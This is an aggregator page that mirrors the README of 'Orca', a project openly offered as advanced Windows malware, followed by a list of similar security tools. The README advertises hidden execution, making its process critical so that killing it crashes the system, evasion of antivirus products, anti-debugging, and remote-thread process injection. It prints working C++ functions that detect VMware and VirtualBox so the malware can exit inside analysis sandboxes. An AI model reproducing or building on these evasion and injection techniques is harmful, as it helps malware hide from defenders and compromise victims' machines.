GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → ZeroM3m0ry → Orca

ZeroM3m0ry / Orca

Licence: other
Advanced Malware with multifeatures written in ASM/C/C++ , work on all windows versions ! (uncompleted)

Programming Languages

C++
36643 projects - #6 most used programming language
assembly
5116 projects
c
50402 projects - #5 most used programming language

Labels

riskmalwarewin32apiprivilege-escalationprocess-hollowingprocess-injectionshellcode-injection

Projects that are alternatives of or similar to Orca

MsfMania
Python AV Evasion Tools
Stars: ✭ 388 (+110.87%)
Mutual labels:  malware, privilege-escalation, shellcode-injection
ThreadBoat
Program Uses Thread Execution Hijacking To Inject Native Shell-code Into a Standard Win32 Application
Stars: ✭ 162 (-11.96%)
Mutual labels:  malware, win32api
HatVenom
HatVenom is a HatSploit native powerful payload generation tool that provides support for all common platforms and architectures.
Stars: ✭ 84 (-54.35%)
Mutual labels:  malware, shellcode-injection
Awesome Hacking Resources
A collection of hacking / penetration testing resources to make you better!
Stars: ✭ 11,466 (+6131.52%)
Mutual labels:  malware, privilege-escalation
windows-defender
Malice Windows Defender AntiVirus Plugin
Stars: ✭ 31 (-83.15%)
Mutual labels:  malware
RiskInDroid
A tool for quantitative risk analysis of Android applications based on machine learning techniques
Stars: ✭ 69 (-62.5%)
Mutual labels:  risk
IDVerification
"Very simple but works well" Computer Vision based ID verification solution provided by LibraX.
Stars: ✭ 44 (-76.09%)
Mutual labels:  risk
flowrisk
A Python Implementation of Measures for Order Flow Risk, e.g. VPIN
Stars: ✭ 53 (-71.2%)
Mutual labels:  risk
Abused-Legitimate-Services
Cloud, CDN, and marketing services leveraged by cybercriminals and APT groups
Stars: ✭ 42 (-77.17%)
Mutual labels:  malware
mirai
The Mirai malware modified for use on NCL/a virtual/simulated environment.
Stars: ✭ 32 (-82.61%)
Mutual labels:  malware
VX-API
Collection of various malicious functionality to aid in malware development
Stars: ✭ 904 (+391.3%)
Mutual labels:  malware
risk
A game of Risk played on a hexgrid.
Stars: ✭ 95 (-48.37%)
Mutual labels:  risk
Umbra
A LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can spawn a reverse shell to a remote host, launch malware and more.
Stars: ✭ 98 (-46.74%)
Mutual labels:  malware
collector
⚖Open Source Toolkit for Conducting Quantitative Risk Assessment Interviews
Stars: ✭ 26 (-85.87%)
Mutual labels:  risk
malware api class
Malware dataset for security researchers, data scientists. Public malware dataset generated by Cuckoo Sandbox based on Windows OS API calls analysis for cyber security researchers
Stars: ✭ 134 (-27.17%)
Mutual labels:  malware
OasisLMF
Loss modelling framework.
Stars: ✭ 84 (-54.35%)
Mutual labels:  risk
FIDL
A sane API for IDA Pro's decompiler. Useful for malware RE and vulnerability research
Stars: ✭ 421 (+128.8%)
Mutual labels:  malware
DFIR Resources REvil Kaseya
Resources for DFIR Professionals Responding to the REvil Ransomware Kaseya Supply Chain Attack
Stars: ✭ 172 (-6.52%)
Mutual labels:  malware
rhino
Agile Sandbox for analyzing Windows, Linux and macOS malware and execution behaviors
Stars: ✭ 49 (-73.37%)
Mutual labels:  malware
social-data
Code and data for eviction and housing analysis in the US
Stars: ✭ 17 (-90.76%)
Mutual labels:  risk
View All Similar Projects ➔

About Orca

  • Orca is an Advanced Malware with multifeatures written in ASM/C/C++

features

  • Run in Background (Hidden Mode)

Critical Process using RtlSetProcessIsCritical

  • RtlSetProcessIsCritical makes the process critical, any attempt to terminate it will BSOD the system (Blue Screen of Death) , although it can be bypassed easly using NtSetInformationProcess by injecting DLL into it , i made PoC of it you can check it from here BypassRtlSetProcessIsCritical


  • Undectable (60+ Antivirus )


Detecting Virtual Environment Files and Processes

  • Code Snippets
  • the following Function will search for VMware Processes
void antiVm()
{
	const char* arr[] = { "vmtoolsd.exe","vmwaretray.exe","vmwareuser.exe" ,"VGAuthService.exe" ,"vmacthlp.exe" };
	for (int i = 0; i < strlen(*arr); i++)
	{
		if (GetPID(arr[i]))
			exit(EXIT_FAILURE);
	}
}
  • the following Function will search for VirtualBox Files
void antiVr() {
	if  (IsExist("C:\\windows\\System32\\vboxoglpackspu.dll"))exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxSF.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxVideo.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglpassthroughspu.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxdisp.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxhook.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxmrxnp.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxogl.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglcrutil.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxGuest.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglerrorspu.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglfeedbackspu.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxMouse.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglarrayspu.dll")) exit(EXIT_FAILURE);
}

Anti-Debug

  • the Malware will self close 'Silently' anytime detect a debugger or being debugged!! AntiDBG Library
  • The techniques that used to Detect debuggers :
  - Memory
  - CPU
  - Timing
  - Forced Exceptions

Process Injection

  • Process Injection It is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

Alt Text

TECHNICAL DETAILS

  • Open process with Access Rights
  • LPTHREAD_START_ROUTINE (its a pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread and represents the starting address of the thread in the remote process. The function must exist in the remote process.)
  • VirtualAllocEx (used to allocate space from the target process virtual memory)
  • WriteProcessMemory (used to write the path of the shellcode into the allocated memory)
  • CreateRemoteThread (used to creates a thread in the virtual memory area of a process)

More Advanced features will be added soon

Disclaimer

  • I take no responsibility for Harmful using or any damage can make. Use it at your own risk.
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].